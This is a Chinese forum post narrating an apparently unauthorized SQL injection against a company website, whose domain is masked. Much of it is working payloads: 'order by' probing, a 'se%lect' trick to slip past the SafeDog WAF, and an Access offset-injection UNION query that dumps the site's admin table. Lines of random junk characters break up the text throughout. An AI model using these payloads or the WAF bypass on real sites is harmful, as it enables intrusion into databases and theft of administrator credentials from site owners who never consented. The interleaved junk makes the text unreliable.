打开网站,一个企业站。
2 I' y+ \% u6 z4 }; {- u- R6 J# `6 R$ t: i
) E% a0 f6 r% f8 r7 X顺手加个admin
8 v$ k# m9 R: K, W% _5 N% n9 F
0 O. e5 e0 @, U$ U X默认后台。
, G* }: R' ~4 @/ s5 E6 _回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
' J% c+ M6 K% D# T. c
) d9 }' T& G) s9 O T0 Z3 o8 f0 [) j" k+ }" ^5 D. i" |( D
" Y+ j0 |9 B' f% D! h
所以就不用御剑扫了,待会直接封IP。
d; w) D3 y; N9 }# N8 z / d) }% [& u2 Q- [0 f1 C- e
用order by语句判断是否存在注入。, F+ k% u5 m- ]3 L
http://www.xxx.com /product_show.asp?id=997 order by 1" V: h9 x6 L2 E! K
http://www.xxx.com /product_show.asp?id=997 order by 100
$ w U- L, R* _5 f现在存在注入,经测试后发现是9个字段。
( H& c5 @. A! J
4 ~2 r8 O5 _4 b4 r接下来进行联合查询,猜是否存在admin表。) ? `- O8 l) M* ?9 Y
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
( i2 O! ~% }, _' }+ [7 u* P4 o+ G+ M0 ]: Z1 N% }* z
" X2 d( G8 h) V
% L: X+ j( }9 L' u; D0 |' K5 `在select中间加个%,se%lect绕过安全狗。7 g0 ?; O$ A z% ~& m l6 C
2 s1 o. `( o- L
0 {+ b+ S% ^' E* n8 [# X' z7 s. ?发现存在admin表,然后开始手工猜常用的字段。
' j3 n' A# P' ]5 k4 z7 |纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
- Q& }, @0 M( D. D + y5 d& P+ `) v9 }! l
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
$ R* Z$ D' R" l) l
# R$ l6 @8 P% H2 g) e& f科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。( e, d0 @) \/ e6 y9 m. q4 v/ `2 l& Z
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
* J6 v6 q3 u8 |% T好了,敏感内容出显了。
- r8 R8 O/ j8 e. E7 h. L( g7 p- P6 G2 f% |4 b
; P7 B" l1 Y1 b2 C( G- T9 _* P/ C. {+ J
|